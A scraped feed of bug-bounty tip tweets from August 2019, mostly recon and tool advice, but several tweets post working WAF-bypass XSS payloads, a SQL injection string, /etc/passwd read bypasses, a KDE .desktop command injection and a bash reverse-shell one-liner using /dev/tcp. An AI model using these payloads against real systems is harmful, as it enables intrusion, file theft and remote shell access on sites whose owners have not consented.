1 Do you guys stop trying for XSS When Cloudflare is used? If not, got any tips? :) #bugbountytip #bugbounty #infosec
Murdockz
@Murdockz_CEH


2019-08-18 02:47:26
1 Guys if you're looking for a way to host a Kali Linux instance in the cloud check out this tutorial on creating your own Kali Linux cloud VM with DigitalOcean https://t.co/xnP1cfd8lZ. I highly recommend. https://t.co/0TpWOKInke #bugbountytips #bugbountytip #bugbounty
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-17 20:41:53
4 ModSecurity { RCE } Detection Bypass 💥 { 1 }; ;+$u+cat+/etc$u/passwd$u { 2 }; ;+$u+cat+/etc$u/passwd+\# #BugBounty #BugBountyTip #WAF #infosec
John
@JohnH4X00R


2019-08-17 18:23:03
2 "Rather than scanning for vulnerabilities, we need to scan for interesting behaviours"... Excellent advice by @albinowax from an old gem, must read... https://t.co/9FPy2OnCBM #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-17 18:22:39
2 Bug Bounty Tip : Target Android Mobile Apps to get the Endpoints/Hostnames and Run PortScan -- #BugBounty #BugBountyTip #hackdoor
C1h2e1
@C1h2e11


2019-08-17 13:41:05
1 #BugBounty #bugbountytip Try to scan these sensitive files or add a header for a quick vulnerability scan https://t.co/ZuZ5xMEqmj
Ammar Amer
@cry__pto


2019-08-17 03:29:40
2 The two most important free resources on the net to learn how to detect & exploit open-redirect & evade WAFs. If you are serious about learning this vulnerability you should visit these sites. https://t.co/IgbCjfguvb https://t.co/dGFkRiy43A https://t.co/1R23RdPEDN #bugbountytip
Soroush Dalili
@irsdl


2019-08-16 21:46:24
3 After spending so much time, finally here it is: "Uploading web.config for Fun and Profit 2" https://t.co/L2XrRRfqU6 #appsec #FileUpload #pentest #bugbountytip https://t.co/O3jVp0TWVq
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-16 21:18:20
0 #burp, #bugbountytip,#bugbountytips Recon with BurpSuite. Only burp no extender. I like this way. https://t.co/siOc5UaDLf
SALTWRX
@SaltwrxLLC


2019-08-16 17:14:00
1 @AFSLabs For those looking to setup a droplet for doing reconnaissance. #bugbountytip
HackIsOn ®
@hackison


2019-08-16 14:45:08
0 [Sensitive Directories] intitle:"Index of" wp-config.php [Sensitive Directories] intitle:index.of./.sql [Pages Containing Login Portals] site:*/cgi-bin/login.html [Various Online Devices] inurl:ftp://ftp robots.txt #dorks #hacking #bugbountytip #bugbountytips #pentesting
Milind Purswani
@MilindPurswani


2019-08-16 14:28:52
0 Have been testing for SSRF bypass for more than 2 hours on 1 endpoint -> Read the policy -> turns out, the endpoint is OOS. "Read the docs man! Read the docs!" 😑😑 #bugbountytip
OWASP Amass
@owaspamass


2019-08-16 14:23:16
0 OWASP Amass Fact: If you use the '-include' flag to reduce sources during your enum, be sure to include one or more of the following for ASN info: networksdb, radb, robtex, shadowserver, teamcymru and/or umbrella #osint #recon #bugbounty #bugbountytip https://t.co/QWTftRbJKT
expl0itc0der
@vanshitmalhotra


2019-08-16 14:04:28
1 Bug Bounty Tips - Always Read The Source Code //<>// #BugBounty #BugBountyTip
vj0shii
@vj0shii


2019-08-16 12:30:00
0 Best laptop for Penetration Testing and Bug Bounty Hunting @Apple @Dell @ASUS_ROG #bugbountytip #Pentesting
Detectify
@detectify


2019-08-16 11:00:10
0 Improving WordPress plugin security from both attack and defense side. Guest blog by @padannewitz. #detectifycrowdsource #bugbountytip https://t.co/627leeeH6R
abdoul gadiri balde
@moodiAbdoul


2019-08-16 10:26:29
1 #bugbounty #bugbountytips #bugbountytip never think that you can find nothing , i hacked a company that have top hacker in 00:51:31 #togetherwehitharder
Fisher
@Regala_


2019-08-16 07:32:13
0 Beta testing for Scope Monitor has started ๐Ÿฅณ๐Ÿฅณ #bugbounty #bugbountytip https://t.co/KREdPY8rJT
◾
@saurinn_


2019-08-16 01:40:12
0 Anyone have a link for a tool to test for different kinds of tokens (Docker specially)? It has a GitHub repo #bugbountytip #bugbountytips #infosec
Mo'men Basel
@Momenbassel


2019-08-15 22:40:44
0 HTTP request headers can be a golden gem for finding vulnerabilities never miss tampering/adding these headers! https://t.co/SdDV656qa7 #BugBounty #bugbountytip #bugbountytips
Hussein Daher
@HusseiN98D


2019-08-15 22:05:06
7 A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! ALSO: I'm interested in any security research team / pentest work (remote). If any company/team is interested about my services DM me :) #bugbounty #bugbountytips #bugbountytip #infosec https://t.co/S1BpVB2LWM
Spicy
@BlackSheepSpicy


2019-08-15 21:31:56
0 #bugbountytip brought this up in @thecybermentor 's stream chat last night but you can load line separated text files into burp suite's scope so you can literally paste sublist3r's output into a text file and chuck the entire scope into burp with just a few clicks #BugBounty
Daher Mohamed
@DaherMohamed4


2019-08-15 20:14:51
0 #BugBountyTip #BBTip If you have win10 and don't want/can't install linux, you can use this tut to have linux/ubuntu terminal on windows : https://t.co/ftDEbdjv8U Must have win10 64 bits
m0z
@LooseSecurity


2019-08-15 14:44:56
1 A lot of programmers seem to forget that POST parameters pose the exact same risks as GET parameters. POST-Based XSS POST-Based CSRF You can even get SQL Injection through POST parameters. It's obvious but some people only check GET parameters out of convenience. #bugbountytip
MRunal
@mrunal110


2019-08-15 10:10:41
4 I just published What is Server-Side Request Forgery (SSRF) and some proof of concept about SSRF. https://t.co/uaTPqB470R #bugs #bugbountytip #infosecurity #cybersecurity #responsibledisclosure #vulnerabilities
Alex Chapman
@ajxchapman


2019-08-15 08:45:26
1 When you get RCE/ Command Injection on a server, check the system uptime. This can reveal the (ab)use of containers and help clarify technical risk #bugbountytip learned from @erbbysam at #h1702
Hendrik
@hendrikvb


2019-08-14 21:29:12
0 #CSRF lesson of the day: IE11 does not properly handle #CORS checks on file URIs! #bugbountytip #vuln #infosec
lavernasec
@lavernasec


2019-08-14 14:38:00
0 Pwn an iPhone to bank $1m and Check Point gripes about WhatsApp privacy again https://t.co/fBUkEesuVv #bugbountytip #iphone #whatsapptips #privacy
{{ '127.0.0.1’}}
@shivam31200


2019-08-14 08:45:53
0 So testing e commerce websites always check cms I found one of e commerce website is using magento I run as magento scan and found critical paths #bugbounty #bugbountytip Noob https://t.co/BBBPNECcrw
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-14 00:19:08
2 </>Cloudflare skip filters, ~XSS Bypass via dot. <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X #WAF #BugBounty #BugBountyTip #infosec
HackIsOn ®
@hackison


2019-08-13 20:17:42
2 Here is a video about the complete step by step installation procedure of latest #nmap 7.80. #hacking #kalilinux #linux #bugbountytip #bugbounty #penetrationtesting #pentesting #windows #redteam 🔴 LINK: https://t.co/8FTl0sOOgT
Vail
@Vail_302


2019-08-13 19:41:01
0 I am still new to #bugbounty , however, if this can help anyone else, I built a cherrytree template to help with organization of targets. Any tips on making it better, let me know. #bugbountytip https://t.co/Ew4mIgsFiu
MRunal
@mrunal110


2019-08-13 18:35:46
0 I Published open-redirect-vulnerability blog https://t.co/tZezs6hMUN #bugs #bugbountytip #infosecurity #cybersecurity
ADM|N|STRAT0R
@strat0r


2019-08-13 17:54:39
0 You can use https://t.co/5wzwWvgY36 or google cache to peek at the landing page for public GitHub repos that have been taken offline ;) #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-13 16:14:40
1 Amazon EBS snapshots exposed publicly leaking sensitive data in hundreds of thousands, security analyst reveals at DefCon 27 #BugBounty #BugBountyTip #devops #devsecops #penetrationtesting #pentesting #aws #cloud #security #cloudsecurity https://t.co/E0M5006vhc
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-13 12:52:25
0 Bug bounty is a project designed to stop hackers and to learn the techniques and methods of hackers. { fucking mercenaries }; #BugBounty #BugBountyTip #WAF #infosec
Fisher
@Regala_


2019-08-13 08:54:07
1 Bounty hunters: how do you organize your notes on targets, especially when switching targets back and forth and doing it for a long time? A thread 👇👇👇 #bugbounty #bugbountytip
GarimaShares
@GarimaBhaskar


2019-08-13 06:50:02
0 Apple is Offering a Bug Bounty of $1 Million If You Can Hack An iPhone https://t.co/nea8djOCnK #Apple #appledaily #applenews #AppleEvent #bugbountytip #MiLLiONS #technews #technologynews #hacking #Hackers #TechTrends #bloggerstribe #blogger #blogpost #garimashares #iOS #macOS https://t.co/Lk3P2YJyt8
mr_nyx
@mr_nyxs


2019-08-12 21:33:27
0 If you have a shop system or any other buying system, you should try intercepting both requests and responses and change the prices in both of them, you might find yourself paying only $5 instead of $1000 #BugBountyTip #BugBounty #parameter_tampering
Andri Wahyudi 🕊️
@andripwn


2019-08-12 20:09:34
0 109 Payloads {URL} for #Hackerone_Programs #DOD #Private_Programs #Public_Programs #bugbounty #recon #bugbountytip https://t.co/e8Tm8nwz2B
Mufeed VH
@mufeedvh


2019-08-12 16:52:00
1 sector:443 CTF Walkthrough: https://t.co/0BWhT2HYFj #ctf #capturetheflag #bugbounty #bugbountytip #bugbountytips
lavernasec
@lavernasec


2019-08-12 14:38:00
0 Apple will now pay hackers up to $1 million for reporting vulnerabilities https://t.co/kYH14KVkB9 #bugbountytip #Apple #vulnerabilities
Ammar Amer
@cry__pto


2019-08-12 12:01:33
2 OPEN REDIRECTS is a dangerous web application vulnerability that should not be ignored by the security team/bug bounty hunters. This vulnerability may lead to installing malware/phishing attacks, and at least the loss of the reputation and clients. #bugbountytip
Andri Wahyudi 🕊️
@andripwn


2019-08-12 11:38:33
0 #Verizon - CORS Vulnerable Leads to Information Disclosure (Critical Impact) #BugBounty #BugBountyTip #CORS https://t.co/zDzL0gjDK9
Wladimir Palant
@WPalant


2019-08-12 09:06:09
2 I tried producing some useful instructions for less experienced people to recognize flaws in password managers. Let me know whether it worked! #infosec #crypto #passwords #bugbounty #bugbountytip https://t.co/WTm5SDpTi9
Ameen
@ameenmaali


2019-08-12 06:48:12
3 #bugbountytip: Duplicating params, headers, etc can be useful for bypasses. i.e., file upload filters can potentially be bypassed by setting Content-Type twice (once for unallowed type and once for allowed). Authorization protection could be bypassed w/ the same method #bugbounty
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:55:30
1 Finding was closed, no return. @YoncuBilisim #WAF #BugBounty #BugBountyTip #infosec https://t.co/eoVvedJriy
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:52:25
0 { Cloudflare }; ~ XSS Bypass: ๐Ÿฆ </Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt> #BugBounty #WAF #BugBountyTip #infosec
[email protected]:~$ sud¤ rm -r /*
@IAMPROPERSAM


2019-08-10 12:15:05
0 I and so many others out there definitely need this... Thanks man. #bugbountytip #bugbountytips https://t.co/wUNiL9k1t7
Andri Wahyudi 🕊️
@andripwn


2019-08-10 06:05:19
3 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #BugBounty #BugBountyTip #infosec
Aziz Hakim
@hackerb0y_


2019-08-10 05:48:46
1 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #infosec #bugbountytips #bugbountytip #bugbounty #xss
Andri Wahyudi 🕊️
@andripwn


2019-08-10 05:29:43
0 13 Hours ~ Fullstack Bug Bounty Programs H1 - 5 Reports Triaged Bugcrowd - 1 Triaged Yeswehack - 4 Triaged Graphql SQL-Injections / CORS / Blind SQL #BugBounty #BugBountytip #13hours #livehacks https://t.co/odsYNkdX2A
Andri Wahyudi 🕊️
@andripwn


2019-08-10 01:31:17
1 Graphql Api Leads to SQL - Injections #graphql #bugbounty #bugbountytip #bugbountytips https://t.co/lFNawsyPA5
Securisec 🚀
@securisec


2019-08-09 22:46:15
0 "RT RT zer0pwn: Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/5f2PjHvwNE #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/1poKJWd4FW"
Arif Khan
@payloadartist


2019-08-09 20:15:13
0 I earned $1,500 for my submission on @bugcrowd #ItTakesACrowd #bugbountytip: Recon is the key to low hanging fruits with great impact! https://t.co/7of1OAuwxa
Guilherme Keerok
@k33r0k


2019-08-09 19:47:55
1 another Cloudflare bypass: <iframe/src=javascript:%2520with(document)with(body)innerHTML="<svg/onload"%2B"=alert\x28\x29\x3e"> #bugbountytip #bugbounty #xss #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-08-09 19:19:28
0 If you have found an XSS on https://t.co/hykP1iWSJZ, find pages running this code on https://t.co/bveLMweNqR : document.domain="https://t.co/dLs7d73fmn " It results in: XSS on A > XSS on B as SOP allows https://t.co/hykP1iWSJZ to access https://t.co/bveLMweNqR #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:07:47
0 Cryptographic Attacks: A Guide for the Perplexed https://t.co/tRqja9L8pA Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:06:10
3 One Misconfig (JIRA) to Leak Them All- Including NASA and Hundreds of Fortune 500 Companies! https://t.co/k6aYmRDj1e Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Twitter - https://t.co/KupiQVo8ex Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
intigriti
@intigriti


2019-08-09 12:08:03
4 Doing recon? Don't forget the company resources! Slides, tutorials and other examples often contain a lot of juicy information! 👀Thanks for the #BugBountyTip, @Alyssa_Herrera_! #HackWithIntigriti https://t.co/CT1UYBZefH
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-09 09:51:11
1 #blindrce turn it in to a { reverse shell! } ๐Ÿ‘๏ธ |`bash -i >& /dev/tcp/yourip/yourport 0>&1` #bugbounty #bugbountytip #waf #infosec
Ennio Campagna
@EnnioCamp


2019-08-09 08:36:10
0 Got excited this morning, just entered in the @CERTEU Hall of Fame, thank you to the #securityteam for the fast response! #bugbounty #bugbountytip perseverance is the key of success
Yassine Aboukir @ DefCon/H1-702
@Yassineaboukir


2019-08-08 20:46:55
0 Cheers to @NahamSec for featuring [ASNLookup](https://t.co/wGiLKKnvCb) tool in his latest stream about techniques to enumerate more assets leveraging Yahoo's ASN as a target example. Check it out! https://t.co/PcoHujPdsV #bugbountytip
Ameen
@ameenmaali


2019-08-08 20:12:30
2 Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty
Dominik
@zer0pwn


2019-08-08 17:24:08
11 Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/L0P5wVuwFD #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/lxygQ8RqSK
gujjuboy10x00
@vis_hacker


2019-08-08 15:30:21
1 awesome git recon for bug hunters specially for newbie @Bugcrowd #ItTakesACrowd #bugbountytip https://t.co/I1r38Ms06X
Spicy
@BlackSheepSpicy


2019-08-08 15:26:51
0 #bugbountytip web server being annoying and 302ing your gobuster? use the wildcard flag and pipe the output thru an inverted grep expression #bugbounty https://t.co/KGeBLCvVzf
artofbugbounty
@artofbugbounty


2019-08-08 15:08:15
0 Not Your Typical Base64 Encoded Data! #bugbountytip https://t.co/pzvYvpzUm6 https://t.co/akZueVxv7o
A DNF 🦖
@binb4sh


2019-08-08 10:47:40
0 If you have found an XSS on https://t.co/N5KFrxiY6l, find pages running this code on https://t.co/qV8UvGQ3nY : document.domain="https://t.co/2KVRowDP4i" It results in: XSS on A > XSS on B as SOP allows https://t.co/N5KFrxiY6l to access https://t.co/qV8UvGQ3nY #bugbountytip
Aashish Yadav
@aa5h15h


2019-08-08 10:26:05
1 Listed In Mozilla HOF https://t.co/hjvZ92kFOj #bugbounty #bugbountytip #webdev #mozilla #firefox #hackerone #bugcrowd #linux #unix #malware @mozilla
Mantis
@MantisSTS


2019-08-08 07:54:08
1 This should come in useful to some! #BugBounty #bugbountytip https://t.co/3jjJ8PrB2c
Andri Wahyudi 🕊️
@andripwn


2019-08-08 07:01:47
0 Paypal Bug Bounty 2019 - Exploiting HTML Injections https://t.co/EvfnAj5QmI #Paypal #BugBounty #BugBountyTip
Benson M
@Benson_Mwaura


2019-08-08 05:00:00
0 🛡️ Discover How Do Bug Bounties Fit Into The Software Development Lifecycle (#infographic 🎨 @Hacker0x01 ) @Fisher85M @pierrepinna @Shirastweet @CLAVDIAmartin @marcoessomba @ggithaiga #Cybersecurity #SecOps #DevOps #CISO #Cloudsec #Infosecurity #bugbountytip #bountyprogram https://t.co/TmRTGB8Mhv
Sanju
@sanjeethboddi


2019-08-08 02:45:12
0 @Amazon If you say simple "another" to the Alexa. It tells you a joke, which doesn't make any sense. You need to fix your NLP/NLG and make you have a proper dialogue flow. #bugbountytip #bugreport #alexa #amazonalexa #nlp #nlg
vavkamil
@vavkamil


2019-08-07 20:21:10
1 XFFenum ~ A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header #bugbounty #bugbountytip https://t.co/BR0X8TlGfT
Sajibe Kanti
@Sajibekantibd


2019-08-07 20:04:45
0 Some Time Check Cookies when Testing PHP based Web Pentest . Maybe You will get Password & user id on Cookies ;) #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 19:58:38
0 Reading { #passwd }, and other files. ๐Ÿง /***/[c][a]* /**[c]/*****[d] {/???/??t,/**[c]/*****[d]} /***/??t /**[c]/*****[d] /***[n]/??t /??[c]/?????[d] #WAF #BugBounty #BugBountyTip #infosec
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-07 19:01:41
0 #bugbountytip #bugbountytips Path: target/worker Yesterday my report Worker Loop Admin panel Noswag, nobounty, nothing Only thanks from owner :) sometime I am kind :) https://t.co/6yIqsMpfU6
Andri Wahyudi 🕊️
@andripwn


2019-08-07 16:51:53
0 XSS { Cloudflare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
intigriti
@intigriti


2019-08-07 16:51:01
0 Got a question? Follow @codingo_'s advice to get help faster! #BugBountyTip https://t.co/pkmcXReL9P
expl0itc0der
@vanshitmalhotra


2019-08-07 16:23:29
2 Security through obscurity works against scanners -- Agree/Disagree ?? #BugBounty #BugBountytip #penetrationtesting #pentesting #hacking #devops #devsecops
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 13:20:11
13 XSS { Cloudflare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
Pavandeep
@Pavandep8


2019-08-07 13:13:18
0 Look what I shared: An introduction to Stack Buffer Overflows - #Hacking #hacker #Security #bugbountytip #BugBounty @MIUI| https://t.co/hM2ysqlhmI
expl0itc0der
@vanshitmalhotra


2019-08-07 12:46:03
0 https://t.co/X7i6Q9BLRA - SEARCH FOR LEAKS Search for Twitter users leaks #OSINT #recon #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-07 11:52:48
2 go ahead and get those awesome free udemy courses for a limited time about python,hacking,ceh,networking,cybersecurity. 18 awesome course for a limited time. may the offer will end after 6 hours. so please share the post. #Hacking #pentest #bugbountytip #infosec #osint https://t.co/Gfiei78NO7
miraitowa
@miraitowa1


2019-08-07 10:25:53
0 Mahmoud Gamal - Security Blogs: Exploiting Out Of Band XXE using internal network ... https://t.co/CgGJMGZWfT #Bugbounty #bugbountytip #XXE
Hilary Sylar
@bit3c0de


2019-08-07 08:57:12
0 In honour of the best XSS tool out here, i wrote a small post about it. Simple and to the point. Great success with it and thought i'd share. https://t.co/UtvkJ3XFu0 #BugBounty #bugbountytip #pentest #xss #knoxss Thanks for the tool @brutelogic .
Mo'men Basel
@Momenbassel


2019-08-07 06:24:37
3 #bugbountytip: install keyFinder at your browser(https://t.co/TqSwU28eb4) --> surf the web --> go to results --> check API key at https://t.co/S3jRAYOEZp #BugBounty #bugbountytips #BugbountyProTip https://t.co/s0uGltinAD
expl0itc0der
@vanshitmalhotra


2019-08-06 20:53:06
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl --bucket bucketname
Pepipost
@pepi_post


2019-08-06 18:27:35
0 Are your emails really reaching Inbox? Find out in this free Email Health Report. Click here : https://t.co/Qr4QcFTjbi #bugbountytip #smtp https://t.co/2U7otQsTLZ
Pepipost
@pepi_post


2019-08-06 16:39:14
1 Is there a way to validate email addresses using #javascript? Lets find out - how!👉 #bugbountytip https://t.co/9FBQD6PGOH
Ammar Amer
@cry__pto


2019-08-06 15:02:59
1 in the 19 chapter of the Real-world Bug Hunting by @yaworsk you will get a useful and detailed chapter about target RECONNAISSANCE and testing the application in an efficient and practical way. again the book is highly recommended. you can find the book at amazon #bugbountytip https://t.co/fPMrQyktZJ
Dhamu
@Dhamuharker


2019-08-06 14:50:27
1 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder XSS to RCE https://t.co/6YM2sk2j9Z
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-06 13:21:38
2 Bypass 405 Alibaba { WAF }; ๐Ÿž with onloadstart/end and encode the parenthesis, /* <audio src=1 onloadstart=alert(1)//> */ #WAF #BugBounty #BugBountyTip #infosec
miraitowa
@miraitowa1


2019-08-06 13:02:37
3 Recon — my way. by @ehsahil https://t.co/5sLBmHqhM8 #bugbounty #bugbountytip #recon
expl0itc0der
@vanshitmalhotra


2019-08-06 12:39:44
0 #Subfinder - Installation and Usage - #hackdoor #bugbounty #tutorial #bugbountytip https://t.co/gQgX9bc4ab
expl0itc0der
@vanshitmalhotra


2019-08-06 12:17:42
1 #Sublister - Installation And Usage Tutorial #bugbounty #bugbountytip #hackdoor https://t.co/hp38xeL37x
expl0itc0der
@vanshitmalhotra


2019-08-06 12:13:31
1 #OWASP #JuiceShop - Challenge / SQL Injection Tutorial #hackdoor #devops #devsecops #bugbounty #bugbountytip https://t.co/N4vjkRujJj
Pepipost
@pepi_post


2019-08-06 09:31:48
3 Send email from website using #javascript #bugbountytip https://t.co/MIzaxCbzXt
Pepipost
@pepi_post


2019-08-06 09:24:59
1 Send email to multiple recipients using AddAddress() in #phpmailer #bugbountytip https://t.co/7JklR843zt
bayani elogada
@metamudkip


2019-08-06 02:33:37
0 The lack of Access-allow-* headers disable CORS on Javascript, but not Postman. Not really a #bugbountytip but oh well
Konark Modi
@konarkmodi


2019-08-05 22:24:15
0 As always a brilliant finding by @logicbomb_1 . Btw, apart from google dork queries you can also use Common Crawl Index to increase your coverage. Example: ``` curl -sX GET "https://t.co/7l4F17TQKh" | jq -r .url | sort -u | cut -d'/' -f3 | sort | uniq ``` #bugbountytip https://t.co/MnOLHGtEg2
Dominik
@zer0pwn


2019-08-05 17:42:05
10 KDE 4/5 KDesktopFile (.desktop) Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/QRtX9Kwd1w
Petko D. Petkov
@pdp


2019-08-05 17:40:15
0 Before running you've got to warm up. Before public speaking you've got to warm up. But I've rarely seen anyone consciously taking steps to warm up before hacking. How is this any different? To get good results you need to make sure your mind is in the right state. #bugbountytip
intigriti
@intigriti


2019-08-05 14:26:22
8 According to @itscachemoney, this sometimes leads to account takeover vulnerabilities. 🤯#BugBountyTip #HackWithIntigriti https://t.co/jQ84SF3tdq
Ammar Amer
@cry__pto


2019-08-05 08:00:11
1 Have a question about hacking? Ask the questions in the comment section. I will help you. #bugbountytip #hacking #redteam #osint #cybersecurity #infosec
Dominik
@zer0pwn


2019-08-05 03:56:03
0 KDE 4/5 KDesktopFile Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/Z49mw6rLni
Ennio Campagna
@EnnioCamp


2019-08-04 22:10:09
0 Great stream @NahamSec, every time i learn something new from your streaming ๐Ÿ™ #bugbountytip #recon
Fisher
@Regala_


2019-08-04 18:22:18
2 Mediocre hunters: fuck there is no way there is a bug on this long standing hardened target Pro hunters: pretty sure there's a bug here somewhere #bugbounty #bugbountytip
Konark Modi
@konarkmodi


2019-08-04 17:25:14
2 If you are testing access to S3 buckets and do not want to configure credentials for testing use --no-sign-request. 'aws s3 command s3://bucket/file --no-sign-request' #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 13:46:58
1 CloudFlare { XSS } Bypass Payload via dot: ๐Ÿž <--`<img/src=` onerror=confirm``> --!> #WAF #BugBounty #BugBountyTip #infosec
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 10:19:52
3 Exactly this 🕵️‍♂️ #WAF #BugBounty #BugBountyTip #infosec https://t.co/RPfTOEfvU9
Guilherme Keerok
@k33r0k


2019-08-04 01:29:45
1 XSS Cloudflare WAF bypass: <img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> #bugBounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-04 00:26:41
3 you can use this tool to dynamically generate your own security (XSS,SQLI,email-format,etc,) payloads for fuzz testing: https://t.co/tONSfTriWq example: echo "<script>alert(1)</script>" | radamsa -n 5 --patterns od #bugbountytip #bugbounty #Hacking #pentest
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 21:58:27
0 SQL WAF-Fail2Ban Payload via dot 👾 (SELECT 6037 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6037=6037,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) #WAF #BugBounty #BugBountyTip #infosec
Ammar Amer
@cry__pto


2019-08-03 21:02:35
1 you should not depend only on one tool to get the job done, you should always use 3 or 4 tools to make sure that you get the required/true results. this applies to all hacking stages. like osint & scanning,,,etc. #bugbountytip #osint #Hacking
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-03 18:46:27
0 Gaining Shell using Server Side Template Injection (SSTI) by @davidvalles007 #bugbountytip https://t.co/07uhXW7Hza
SECARMY
@secarmyofficial


2019-08-03 18:40:30
1 😱Hurry Join Book Your Seats Now 💢For Web App Pentesting Training 🌀Tomorrow Is Last Day Sign up to below link🔗 https://t.co/9EPBgaPB5R #Hackers #HackerSummerCamp #HackLearning #bugbounty #bugbountytip #WebApp https://t.co/DBocFwUbUD
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 17:48:25
0 XSS { Cloudflare } bypass: 👾 <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> #WAF #BugBounty #BugBountyTip #infosec
Random Robbie
@Random_Robbie


2019-08-03 13:18:26
6 #bugbountytip - Got a LFI on a php app.... Check for sessions at /var/lib/php/session Should be easy account takeover from there :D
expl0itc0der
@vanshitmalhotra


2019-08-03 09:49:14
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl --bucket bucketname
Ennio Campagna
@EnnioCamp


2019-08-03 06:34:31
0 New entry!! Time to #learn ! #bugbounty #bugbountytip https://t.co/ha26xRNaET
XRSI
@XRSIdotorg


2019-08-02 18:58:40
0 Trust, Privacy and Safety will define the success of XR Technologies. Thts why #XRSI is in conversations wth industry leaders to roll out a dedicated #XR #bugbounty program, so we stay ahead of the bad guys : https://t.co/jsB7Zd2Aop. #BugBountyTip #appsec #AR #VR @ReadyHackerOne https://t.co/esWcitsv16
Andri Wahyudi 🕊️
@andripwn


2019-08-02 18:39:19
0 How do I open a report that has been closed by @Hacker0x01 ? but, give an impact and a very clear explanation, to open your report and become Triaged #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-02 16:27:45
1 Network ~javascript execution payload: { <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> } #WAF #BugBounty #BugBountyTip #infosec
Detectify
@detectify


2019-08-02 15:11:43
2 New blog from Crowdsource hacker @gwendallecoguic: A tutorial on bypassing Cloudflare WAF with the origin server IP address. #bugbountytip https://t.co/HvSq0iBkk9
ᴂ
@pouyana1


2019-08-02 11:47:12
1 A bug on the printer and this is the result ๐Ÿ˜: #BugBountyTip #bugbounty #hacking #hack https://t.co/pd2ekxbTkf
Petko D. Petkov
@pdp


2019-08-02 11:08:00
1 Devious bug bounty tip: setup your own bug bounty program on @Hacker0x01 with solid rewards. Monitor what other hackers are doing and reflect to your targets. Muhaha #bugbountytip
emir c a
@emirca_


2019-08-02 10:32:28
0 Should we test only websites which has vulnerability bounty programs or test every possible website as we can and inform the companies? #BugBountyTip #BugBounty
Malav Sharma (Wolfdroid)
@ShMalav


2019-08-02 04:32:57
1 #bugbountytip Some people made it quite early, some took a lot of time …. but eventually they all made it … It's just about your curiosity and hard work and most important keep doing it .. never leave the field
Mo'men Basel
@Momenbassel


2019-08-02 02:57:09
